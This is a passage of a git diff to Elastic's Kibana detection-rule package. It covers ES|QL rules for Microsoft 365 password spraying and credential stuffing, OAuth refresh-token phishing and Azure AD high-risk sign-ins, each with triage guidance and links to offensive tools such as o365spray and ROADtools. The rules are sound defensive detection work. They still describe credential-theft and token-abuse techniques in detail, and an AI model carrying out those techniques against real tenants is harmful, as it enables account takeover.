stuffing, or password guessing. 
Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams.", - "false_positives": [ - "Automated processes that attempt to authenticate using expired credentials or have misconfigured authentication settings may lead to false positives." - ], - "from": "now-60m", - "interval": "10m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential Microsoft 365 Brute Force via Entra ID Sign-Ins", - "note": "## Triage and analysis\n\n### Investigating Potential Microsoft 365 Brute Force via Entra ID Sign-Ins\n\nIdentifies brute-force authentication activity against Microsoft 365 services using Entra ID sign-in logs. This detection groups and classifies failed sign-in attempts based on behavior indicative of password spraying, credential stuffing, or password guessing. The classification (`bf_type`) is included for immediate triage.\n\n### Possible investigation steps\n\n- Review `bf_type`: Classifies the brute-force behavior (`password_spraying`, `credential_stuffing`, `password_guessing`).\n- Examine `user_id_list`: Review the identities targeted. Are they admins, service accounts, or external identities?\n- Review `login_errors`: Multiple identical errors (e.g., `\"Invalid grant...\"`) suggest automated abuse or tooling.\n- Check `ip_list` and `source_orgs`: Determine if requests came from known VPNs, hosting providers, or anonymized infrastructure.\n- Validate `unique_ips` and `countries`: Multiple countries or IPs in a short window may indicate credential stuffing or distributed spray attempts.\n- Compare `total_attempts` vs `duration_seconds`: High volume over a short duration supports non-human interaction.\n- Inspect `user_agent.original` via `device_detail_browser`: Clients like `Python Requests` or `curl` are highly suspicious.\n- Investigate `client_app_display_name` and `incoming_token_type`: Identify non-browser-based logins, token abuse or commonly mimicked clients like VSCode.\n- Review `target_resource_display_name`: Confirm the service being targeted (e.g., SharePoint, Exchange). 
This may be what authorization is being attempted against.\n- Pivot using `session_id` and `device_detail_device_id`: Determine if a single device is spraying multiple accounts.\n- Check `conditional_access_status`: If \"notApplied\", determine whether conditional access is properly scoped.\n- Correlate `user_principal_name` with successful sign-ins: Investigate surrounding logs for lateral movement or privilege abuse.\n\n### False positive analysis\n\n- Developer automation (e.g., CI/CD logins) or mobile sync errors may create noisy but benign login failures.\n- Red team exercises or pentesting can resemble brute-force patterns.\n- Legacy protocols or misconfigured service principals may trigger repeated login failures from the same IP or session.\n\n### Response and remediation\n\n- Notify identity or security operations teams to investigate further.\n- Lock or reset affected user accounts if compromise is suspected.\n- Block the source IP(s) or ASN temporarily using conditional access or firewall rules.\n- Review tenant-wide MFA and conditional access enforcement.\n- Audit targeted accounts for password reuse across systems or tenants.\n- Enable lockout or throttling policies for repeated failed login attempts.\n", - "query": "FROM logs-azure.signinlogs*\n\n| EVAL\n time_window = DATE_TRUNC(5 minutes, @timestamp),\n user_id = TO_LOWER(azure.signinlogs.properties.user_principal_name),\n ip = source.ip,\n login_error = azure.signinlogs.result_description,\n error_code = azure.signinlogs.result_type,\n request_type = TO_LOWER(azure.signinlogs.properties.incoming_token_type),\n app_name = TO_LOWER(azure.signinlogs.properties.app_display_name),\n asn_org = source.`as`.organization.name,\n country = source.geo.country_name,\n user_agent = user_agent.original,\n event_time = @timestamp\n\n| WHERE event.dataset == \"azure.signinlogs\"\n AND event.category == \"authentication\"\n AND azure.signinlogs.category IN (\"NonInteractiveUserSignInLogs\", \"SignInLogs\")\n AND azure.signinlogs.properties.resource_display_name RLIKE \"(.*)365|SharePoint|Exchange|Teams|Office(.*)\"\n AND event.outcome == \"failure\"\n AND NOT STARTS_WITH(\"Account is locked\", login_error)\n AND azure.signinlogs.result_type IN (\n \"50034\", // UserAccountNotFound\n \"50126\", // InvalidUserNameOrPassword\n \"50053\", // IdsLocked or too many sign-in failures\n \"70000\", // InvalidGrant\n \"70008\", // Expired or revoked refresh token\n \"70043\", // Bad token due to sign-in frequency\n \"50057\", // UserDisabled\n \"50055\", // Password expired\n \"50056\", // Invalid or null password\n \"50064\", // Credential validation failure\n \"50076\", // MFA required but not passed\n \"50079\", // MFA registration required\n \"50105\" // EntitlementGrantsNotFound (no access to app)\n )\n AND user_id IS NOT NULL AND user_id != \"\"\n AND user_agent != \"Mozilla/5.0 (compatible; MSAL 1.0) PKeyAuth/1.0\"\n\n| STATS\n authentication_requirement = VALUES(azure.signinlogs.properties.authentication_requirement),\n client_app_id = VALUES(azure.signinlogs.properties.app_id),\n client_app_display_name = VALUES(azure.signinlogs.properties.app_display_name),\n target_resource_id = VALUES(azure.signinlogs.properties.resource_id),\n target_resource_display_name = VALUES(azure.signinlogs.properties.resource_display_name),\n conditional_access_status = VALUES(azure.signinlogs.properties.conditional_access_status),\n device_detail_browser = VALUES(azure.signinlogs.properties.device_detail.browser),\n device_detail_device_id = 
VALUES(azure.signinlogs.properties.device_detail.device_id),\n incoming_token_type = VALUES(azure.signinlogs.properties.incoming_token_type),\n risk_state = VALUES(azure.signinlogs.properties.risk_state),\n session_id = VALUES(azure.signinlogs.properties.session_id),\n user_id = VALUES(azure.signinlogs.properties.user_id),\n user_principal_name = VALUES(azure.signinlogs.properties.user_principal_name),\n result_description = VALUES(azure.signinlogs.result_description),\n result_signature = VALUES(azure.signinlogs.result_signature),\n result_type = VALUES(azure.signinlogs.result_type),\n\n unique_users = COUNT_DISTINCT(user_id),\n user_id_list = VALUES(user_id),\n login_errors = VALUES(login_error),\n unique_login_errors = COUNT_DISTINCT(login_error),\n request_types = VALUES(request_type),\n app_names = VALUES(app_name),\n ip_list = VALUES(ip),\n unique_ips = COUNT_DISTINCT(ip),\n source_orgs = VALUES(asn_org),\n countries = VALUES(country),\n unique_country_count = COUNT_DISTINCT(country),\n unique_asn_orgs = COUNT_DISTINCT(asn_org),\n first_seen = MIN(event_time),\n last_seen = MAX(event_time),\n total_attempts = COUNT()\n BY time_window\n\n| EVAL\n duration_seconds = DATE_DIFF(\"seconds\", first_seen, last_seen),\n bf_type = CASE(\n unique_users >= 15 AND unique_login_errors == 1 AND total_attempts >= 10 AND duration_seconds <= 1800, \"password_spraying\",\n unique_users >= 8 AND total_attempts >= 15 AND unique_login_errors <= 3 AND unique_ips <= 5 AND duration_seconds <= 600, \"credential_stuffing\",\n unique_users == 1 AND unique_login_errors == 1 AND total_attempts >= 30 AND duration_seconds <= 300, \"password_guessing\",\n \"other\"\n )\n\n| KEEP\n time_window, bf_type, duration_seconds, total_attempts, first_seen, last_seen,\n unique_users, user_id_list, login_errors, unique_login_errors, request_types,\n app_names, ip_list, unique_ips, source_orgs, countries,\n unique_country_count, unique_asn_orgs,\n\n authentication_requirement, client_app_id, client_app_display_name,\n target_resource_id, target_resource_display_name, conditional_access_status,\n device_detail_browser, device_detail_device_id, incoming_token_type,\n risk_state, session_id, user_id, user_principal_name,\n result_description, result_signature, result_type\n\n| WHERE bf_type != \"other\"\n", - "references": [ - "https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying", - "https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray", - "https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties", - "https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/", - "https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes", - "https://github.com/0xZDH/Omnispray", - "https://github.com/0xZDH/o365spray" - ], - "risk_score": 47, - "rule_id": "35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": 
"https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - }, - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 104 - }, - "id": "35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_104", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_107.json b/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_107.json index edc9f3575bc..083ea8341d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_107.json +++ b/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_107.json @@ -23,6 +23,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 47, "rule_id": "35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_1.json b/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_1.json deleted file mode 100644 index 3d6aec26088..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_1.json +++ /dev/null @@ -1,60 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token.", - "from": "now-1h", - "language": "esql", - "license": "Elastic License v2", - "name": "Suspicious Microsoft 365 UserLoggedIn via OAuth Code", - "note": "## Triage and analysis\n\n### Investigating Suspicious Microsoft 365 UserLoggedIn via OAuth Code\n\n### Possible Investigation Steps:\n\n- `o365.audit.UserId`: The identity value the application is acting on behalf of principal user.\n- `unique_ips`: Analyze the list of unique IP addresses used within the 30-minute window. 
Determine whether these originate from different geographic regions, cloud providers, or anonymizing infrastructure (e.g., Tor or VPNs).\n- `target_time_window`: Use the truncated time window to pivot into raw events to reconstruct the full sequence of resource access events, including exact timestamps and service targets.\n- `azure.auditlogs` to check for device join or registration events around the same timeframe.\n- `azure.identityprotection` to identify correlated risk detections, such as anonymized IP access or token replay.\n- Any additional sign-ins from the `ips` involved, even outside the broker, to determine if tokens have been reused elsewhere.\n\n### False Positive Analysis\n\n- Developers or IT administrators working across environments may also produce similar behavior.\n\n### Response and Remediation\n\n- If confirmed unauthorized, revoke all refresh tokens for the affected user and remove any devices registered during this session.\n- Notify the user and determine whether the device join or authentication activity was expected.\n- Audit Conditional Access and broker permissions (`29d9ed98-a469-4536-ade2-f981bc1d605e`) to ensure policies enforce strict access controls.\n- Consider blocking token-based reauthentication to Microsoft Graph and DRS from suspicious locations or user agents.\n- Continue monitoring for follow-on activity like lateral movement or privilege escalation.\n", - "query": "from logs-o365.audit-default*\n| WHERE event.dataset == \"o365.audit\" and event.action == \"UserLoggedIn\" and\n source.ip is not null and o365.audit.UserId is not null and o365.audit.ApplicationId is not null and o365.audit.UserType in (\"0\", \"2\", \"3\", \"10\") and \n\n // filter for successful logon to Microsoft Graph and from the Microsoft Authentication Broker or Visual Studio Code\n o365.audit.ApplicationId in (\"aebc6443-996d-45c2-90f0-388ff96faa56\", \"29d9ed98-a469-4536-ade2-f981bc1d605e\") and\n o365.audit.ObjectId in (\"00000003-0000-0000-c000-000000000000\")\n\n// keep relevant fields only\n| keep @timestamp, o365.audit.UserId, source.ip, o365.audit.ApplicationId, o365.audit.ObjectId, o365.audit.ExtendedProperties.RequestType, source.as.organization.name, o365.audit.ExtendedProperties.ResultStatusDetail\n\n// case statements to track which are OAuth2 authorization request via redirect and which are related to OAuth2 code to token conversion\n| eval oauth_authorize = case(o365.audit.ExtendedProperties.RequestType == \"OAuth2:Authorize\" and o365.audit.ExtendedProperties.ResultStatusDetail == \"Redirect\", o365.audit.UserId, null), oauth_token = case(o365.audit.ExtendedProperties.RequestType == \"OAuth2:Token\", o365.audit.UserId, null)\n\n// split time to 30 minutes intervals\n| eval target_time_window = DATE_TRUNC(30 minutes, @timestamp)\n\n// aggregate by principal, applicationId, objectId and time window\n| stats unique_ips = COUNT_DISTINCT(source.ip), source_ips = VALUES(source.ip), appIds = VALUES(o365.audit.ApplicationId), asn = values(`source.as.organization.name`), is_oauth_token = COUNT_DISTINCT(oauth_token), is_oauth_authorize = COUNT_DISTINCT(oauth_authorize) by o365.audit.UserId, target_time_window, o365.audit.ApplicationId, o365.audit.ObjectId\n\n// filter for cases where the same appId is used by the same principal user to access the same object and from multiple addresses via OAuth2 token\n| where unique_ips >= 2 and is_oauth_authorize > 0 and is_oauth_token > 0\n", - "references": [ - 
"https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", - "https://github.com/dirkjanm/ROADtools", - "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" - ], - "risk_score": 73, - "rule_id": "36188365-f88f-4f70-8c1d-0b9554186b9c", - "setup": "## Setup\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Resources: Investigation Guide", - "Tactic: Defense Evasion" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1550", - "name": "Use Alternate Authentication Material", - "reference": "https://attack.mitre.org/techniques/T1550/", - "subtechnique": [ - { - "id": "T1550.001", - "name": "Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1550/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "36188365-f88f-4f70-8c1d-0b9554186b9c_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_4.json b/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_4.json index ec7be5ef2a0..af3e8ac515d 100644 --- a/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_4.json +++ b/packages/security_detection_engine/kibana/security_rule/36188365-f88f-4f70-8c1d-0b9554186b9c_4.json @@ -16,6 +16,12 @@ "https://github.com/dirkjanm/ROADtools", "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 73, "rule_id": "36188365-f88f-4f70-8c1d-0b9554186b9c", "setup": "## Setup\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_1.json deleted file mode 100644 index 6c0339644db..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_1.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies suspicious activity from the Microsoft Authentication Broker in Microsoft Entra ID sign-in logs. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to register a device and access Microsoft services as a user. 
The pattern includes sign-ins from multiple IPs across services (Microsoft Graph, DRS, AAD) using the Authentication Broker client on behalf of a principal user.", - "false_positives": [ - "Legitimate device registrations using Microsoft Authentication Broker may occur during corporate enrollment scenarios or bulk provisioning, but it is uncommon for multiple source IPs to register the same identity across Microsoft Graph, Device Registration Service (DRS), and Azure Active Directory (AAD) in a short time span." - ], - "from": "now-1h", - "language": "esql", - "license": "Elastic License v2", - "name": "Suspicious Activity via Auth Broker On-Behalf-of Principal User", - "note": "## Triage and analysis\n\n### Investigating Suspicious Activity via Auth Broker On-Behalf-of Principal User\n\nThis rule identifies suspicious activity from the Microsoft Authentication Broker where the same identity accesses Microsoft Graph at least twice and either Device Registration Service (DRS) or Azure Active Directory (AAD) once \u2014 all from multiple unique source IPs within a short window. This behavior may indicate the use of a previously phished refresh token to impersonate a user and register a device, followed by an attempt to acquire a Primary Refresh Token (PRT) for persistent access.\n\n### Possible Investigation Steps:\n\n- `target`: The user principal name targeted by the authentication broker. Investigate whether this user has recently registered a device, signed in from new IPs, or has had recent password resets or MFA changes.\n- `azure.signinlogs.identity`: The identity value the broker is acting on behalf of. This may be useful when correlating to device registration records or audit events tied to object IDs.\n- `ips`: Analyze the list of unique IP addresses used within the 30-minute window. Determine whether these originate from different geographic regions, cloud providers, or anonymizing infrastructure (e.g., Tor or VPNs).\n- `incoming_token_type`: Look for values like `\"refreshToken\"` or `\"none\"`, which may indicate token replay. `\"refreshToken\"` suggests broker-based reauthentication using stolen credentials.\n- `user_agents`: Check for mixed user agent strings. Automation tools (e.g., `python-requests`) alongside browser-based agents (e.g., Chrome on macOS) may indicate scripted misuse of tokens.\n- `OS`: Review for inconsistencies. 
For example, if both `Windows` and `MacOs` appear during a short time span for the same user, this may point to token abuse across multiple environments.\n- `target_time_window`: Use the truncated time window to pivot into raw `azure.signinlogs` to reconstruct the full sequence of resource access events, including exact timestamps and service targets.\n- `azure.auditlogs` to check for device join or registration events around the same timeframe.\n- `azure.identityprotection` to identify correlated risk detections, such as anonymized IP access or token replay.\n- Any additional sign-ins from the `ips` involved, even outside the broker, to determine if tokens have been reused elsewhere.\n\n### False Positive Analysis\n\n- This pattern may occur if the user is registering a new device legitimately from two networks (e.g., mobile hotspot and home).\n- Security software (e.g., endpoint detection tools) or identity clients may produce rapid Graph and DRS access in rare edge cases.\n- Developers or IT administrators working across environments may also produce similar behavior.\n\n### Response and Remediation\n\n- If confirmed unauthorized, revoke all refresh tokens for the affected user and remove any devices registered during this session.\n- Notify the user and determine whether the device join or authentication activity was expected.\n- Audit Conditional Access and broker permissions (`29d9ed98-a469-4536-ade2-f981bc1d605e`) to ensure policies enforce strict access controls.\n- Consider blocking token-based reauthentication to Microsoft Graph and DRS from suspicious locations or user agents.\n- Continue monitoring for follow-on activity like lateral movement or privilege escalation.\n", - "query": "FROM logs-azure.signinlogs* metadata _id, _version, _index\n\n// filter for Microsoft Entra ID Sign-in Logs\n| where event.dataset == \"azure.signinlogs\"\n\n // filters on member principals, excluding service principals\n and azure.signinlogs.properties.user_type == \"Member\"\n and source.ip is not null\n and azure.signinlogs.identity is not null\n and azure.signinlogs.properties.user_principal_name is not null\n and event.outcome == \"success\"\n\n // filter for successful sign-ins to Microsoft Graph and DRS/AAD from the Microsoft Authentication Broker\n and (azure.signinlogs.properties.app_display_name == \"Microsoft Authentication Broker\" or azure.signinlogs.properties.app_id == \"29d9ed98-a469-4536-ade2-f981bc1d605e\")\n and azure.signinlogs.properties.resource_display_name in (\"Device Registration Service\", \"Microsoft Graph\", \"Windows Azure Active Directory\")\n\n// keep relevant fields\n| keep @timestamp, azure.signinlogs.identity, source.ip, azure.signinlogs.properties.app_display_name, azure.signinlogs.properties.resource_display_name, azure.signinlogs.properties.user_principal_name, azure.signinlogs.properties.incoming_token_type, user_agent.original, azure.signinlogs.properties.device_detail.operating_system\n\n// aggregate by 30-minute time window\n| eval target_time_window = DATE_TRUNC(30 minutes, @timestamp)\n\n// case statements to track which are MS Graph, DRS, and AAD access\n| eval ms_graph = case(azure.signinlogs.properties.resource_display_name == \"Microsoft Graph\", source.ip, null), drs = case(azure.signinlogs.properties.resource_display_name == \"Device Registration Service\", source.ip, null), aad = case(azure.signinlogs.properties.resource_display_name == \"Windows Azure Active Directory\", source.ip, null)\n\n// aggregate by principal and time window\n// store token 
types, target user, unique source IPs, and user agents in arrays for investigation\n| stats is_ms_graph = COUNT_DISTINCT(ms_graph), is_drs = COUNT_DISTINCT(drs), is_aad = COUNT_DISTINCT(aad), unique_src_ip = COUNT_DISTINCT(source.ip), ips = VALUES(source.ip), incoming_token_type = VALUES(azure.signinlogs.properties.incoming_token_type), target = VALUES(azure.signinlogs.properties.user_principal_name), user_agents = VALUES(user_agent.original), OS = VALUES(azure.signinlogs.properties.device_detail.operating_system) by azure.signinlogs.identity, target_time_window\n\n// filter for cases with multiple unique source IPs, and at least one DRS or AAD access, and multiple MS Graph accesses\n| where unique_src_ip >= 2 and (is_drs >= 1 or is_aad >= 1) and is_ms_graph >= 2\n", - "references": [ - "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", - "https://github.com/dirkjanm/ROADtools", - "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" - ], - "risk_score": 73, - "rule_id": "375132c6-25d5-11f0-8745-f661ea17fbcd", - "setup": "#### Required Microsoft Entra ID Sign-In Logs\nThis rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration.\n", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Resources: Investigation Guide", - "Tactic: Defense Evasion", - "Tactic: Persistence" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1550", - "name": "Use Alternate Authentication Material", - "reference": "https://attack.mitre.org/techniques/T1550/", - "subtechnique": [ - { - "id": "T1550.001", - "name": "Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1550/001/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.005", - "name": "Device Registration", - "reference": "https://attack.mitre.org/techniques/T1098/005/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "375132c6-25d5-11f0-8745-f661ea17fbcd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_4.json b/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_4.json index 493fd4c7227..7e5313c3874 100644 --- a/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/375132c6-25d5-11f0-8745-f661ea17fbcd_4.json @@ -19,6 +19,12 @@ "https://github.com/dirkjanm/ROADtools", "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 73, 
"rule_id": "375132c6-25d5-11f0-8745-f661ea17fbcd", "setup": "#### Required Microsoft Entra ID Sign-In Logs\nThis rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_106.json b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_106.json deleted file mode 100644 index 25876b7a045..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_106.json +++ /dev/null @@ -1,85 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Willem D'Haese" - ], - "description": "Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Active Directory High Risk Sign-in", - "note": "## Triage and analysis\n\n### Investigating Azure Active Directory High Risk Sign-in\n\nMicrosoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks.\n\nThis rule identifies events produced by Microsoft Identity Protection with high risk levels or high aggregated risk level.\n\n#### Possible investigation steps\n\n- Identify the Risk Detection that triggered the event. A list with descriptions can be found [here](https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection).\n- Identify the user account involved and validate whether the suspicious activity is normal for that user.\n - Consider the source IP address and geolocation for the involved user account. Do they look normal?\n - Consider the device used to sign in. 
Is it registered and compliant?\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\nIf this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and device conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices) by Microsoft.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:azure.signinlogs and\n (azure.signinlogs.properties.risk_level_during_signin:high or azure.signinlogs.properties.risk_level_aggregated:high) and\n event.outcome:(success or Success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/howto-conditional-access-policy-risk", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection", - "https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.22.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.risk_level_aggregated", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.risk_level_during_signin", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "37994bca-0611-4500-ab67-5588afe73b77", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with 
this rule.\n\nNote that details for `azure.signinlogs.properties.risk_level_during_signin` and `azure.signinlogs.properties.risk_level_aggregated`\nare only available for Azure AD Premium P2 customers. All other customers will be returned `hidden`.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 106 - }, - "id": "37994bca-0611-4500-ab67-5588afe73b77_106", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/37cb6756-8892-4af3-a6bd-ddc56db0069d_3.json b/packages/security_detection_engine/kibana/security_rule/37cb6756-8892-4af3-a6bd-ddc56db0069d_3.json new file mode 100644 index 00000000000..5e1686c17f4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/37cb6756-8892-4af3-a6bd-ddc56db0069d_3.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "LSA protection is provided to prevent nonprotected processes from reading memory and injecting code. This feature provides added security for the credentials that LSA stores and manages. Adversaries may modify the RunAsPPL registry value and wait for or initiate a system restart to enable Lsass credentials access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-crowdstrike.fdr*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling Lsa Protection via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Disabling Lsa Protection via Registry Modification\n\nFor more information about Lsa Protection and how it works, check the [official Microsoft docs page](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection).\n\nAttackers may disable 